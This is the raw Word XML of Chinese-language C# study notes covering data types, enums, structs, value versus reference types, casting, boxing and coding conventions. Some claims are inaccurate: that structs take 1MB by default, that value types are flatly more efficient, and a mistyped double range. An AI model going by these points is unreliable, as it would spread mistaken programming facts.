        <w:ind w:firstLine="945" w:firstLineChars="450"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:ind w:firstLine="945" w:firstLineChars="450"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计算机的存储单位由小到大：bit =&gt; byte =&gt; kb =&gt; mb =&gt; gb =&gt; tb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pP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16"/>
        <w:gridCol w:w="2114"/>
        <w:gridCol w:w="2112"/>
        <w:gridCol w:w="2108"/>
        <w:gridCol w:w="2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tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2114" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2112" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2108" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2232" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>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tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>Byte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2114" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>8位</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2112" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>8bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2108" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1b空间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2232" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>0~255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tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>S</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>hort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2114" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2112" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>16bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2108" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2b空间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2232" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>-32768~32767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tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>I</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>nt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2114" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>32位</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2112" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>32bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2108" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>4b空间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2232" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>-21亿~21亿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tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>F</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>loat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2114" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>精确到7位数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2112" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2108" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2232" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>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tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>D</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ouble</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2114" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>精确到15~16位数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2112" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2108" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2232" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>50X10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>-324</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>~1.7X10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>308</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>枚举</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：定义了一组常量键值对，直接可以取出int类型的值，如需取出键需调用Enum.GetName()方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>结构体</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：与类相似，用struct定义；存放在栈中默认占用1MB空间；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>43180</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>15875</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6652260" cy="3705225"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="32" name="图片 30" descr="TIM截图201809140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descr="TIM截图20180914095328.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6649554" cy="3705308"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>值类型与引用类型的区别</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：值类型是存放在栈上，默认大小1MB，引用类型只受机器内存的限制。所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>值类型的效率比引用类型的高</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>设计思想的区别</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：对于动态大小的东西一般放在引用类型中，对于固定大小的东西放在值类型中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>常量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，用const修饰，它是和类绑定的，静态的，它的值被初始化后不可修改。常量名通常用大写字母表示。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
        <w:spacing w:before="376" w:beforeAutospacing="0" w:after="452" w:afterAutospacing="0" w:line="23" w:lineRule="atLeast"/>
        <w:ind w:firstLine="156" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:b/>
          <w:color w:val="A52A2A"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
          <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
        </w:rPr>
        <w:t>C#类型转换</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型转换可以分为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>隐式类型转换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>强制类型转换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>值类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中将小范围的转化为大范围的是隐式转换，例如：byte转int，因为byte占用1b空间，int占用4b空间。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值类型中将大范围转换为小类型的是强制转换，例如：int转byte，编译器会提示编译错误，需要加上括号或者调用Convert类的方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果使用括号，有可能会出现错误的结果，这将让错误的结果在程序中运行。而如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>使用Convert类的方法，后台会抛出异常，推荐使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>引用类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中将子类型转换为父类型的是隐式转换，将父类型转换为子类型是强制转换。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>值类型和引用类型之间的转换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>装箱</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>拆箱</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">装箱操作指的是值类型转成引用类型：object </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> obj = 10;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拆箱操作指的是引用类型转成值类型：int num = (int)obj;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:spacing w:line="360" w:lineRule="exact"/>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C#书写规范和命名规范</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>书写规范</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>尽量使用接口，然后使用类实现接口，以提高程序的灵活性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>一行不要超过80个字符</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>关键的语句写注释</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>建议局部变量在最接近使用它的地方声明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>不要使用goto系列语句，除非使用在跳出深层循环时</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>避免出现使用超过5个参数的方法。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>可以用类来代替</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>8.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>避免书写代码量过大的try....catch模块</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>9.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>避免同一个文件中放置多个类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>，尽量一个文件对应一个类型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>10.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>生成和构建一个长的字符串时，一定要使用StringBuilder类型，而不用string类型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>11.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>switch语句一定要有default语句来处理意外情况</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>12.</w:t>
      </w:r>
